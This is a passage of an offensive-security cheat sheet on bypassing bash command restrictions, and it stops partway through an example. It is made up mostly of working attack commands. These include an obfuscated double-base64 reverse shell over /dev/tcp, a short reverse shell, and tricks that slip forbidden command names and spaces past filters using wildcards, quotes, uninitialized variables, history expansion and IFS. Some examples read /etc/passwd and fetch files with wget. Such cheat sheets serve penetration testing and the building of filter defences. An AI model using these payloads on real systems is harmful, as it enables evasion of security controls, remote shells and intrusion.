# Bypass Bash Restrictions ## Reverse Shell ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' #echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` ### Short Rev shell ```bash #Trick from Dikline #Get a rev shell with (sh)0>/dev/tcp/10.10.10.10/443 #Then get the out of the rev shell executing inside of it: exec >&0 ``` ## Bypass Paths and forbidden words ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost # Wildcard(*) binary substitution /usr/bin/who*mi # /usr/bin/whoami # Wildcard + local directory arguments touch -- -la # -- stops processing options after the -- ls * # [chars] /usr/bin/n[c] # /usr/bin/nc # Quotes / Concatenation 'p'i'n'g # ping "w"h"o"a"m"i # whoami \u\n\a\m\e \-\a # uname -a ech''o test # echo test ech""o test # echo test bas''e64 # base64 /\b\i\n/////s\h # Execution through $0 echo whoami|$0 # Uninitialized variables: A uninitialized variable equals to null (nothing) cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters # Fake commands p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown # Concatenation of strings using history !-1 # This will be substitute by the last command executed, and !-2 by the penultimate command mi # This will throw an error whoa # This will throw an error !-1!-2 # This will execute whoami ``` ## Bypass forbidden spaces ```bash # {form} {cat,lol.txt} # cat lol.txt {echo,test} # echo test ## IFS - Internal field separator, change " " for any other character ("]" in this case) cat${IFS}/etc/passwd # cat /etc/passwd cat$IFS/etc/passwd # cat /etc/passwd # Put the command line in a variable and then execute it IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b IFS=];b=cat]/etc/passwd;$b # Using 2 ";" IFS=,;`cat<<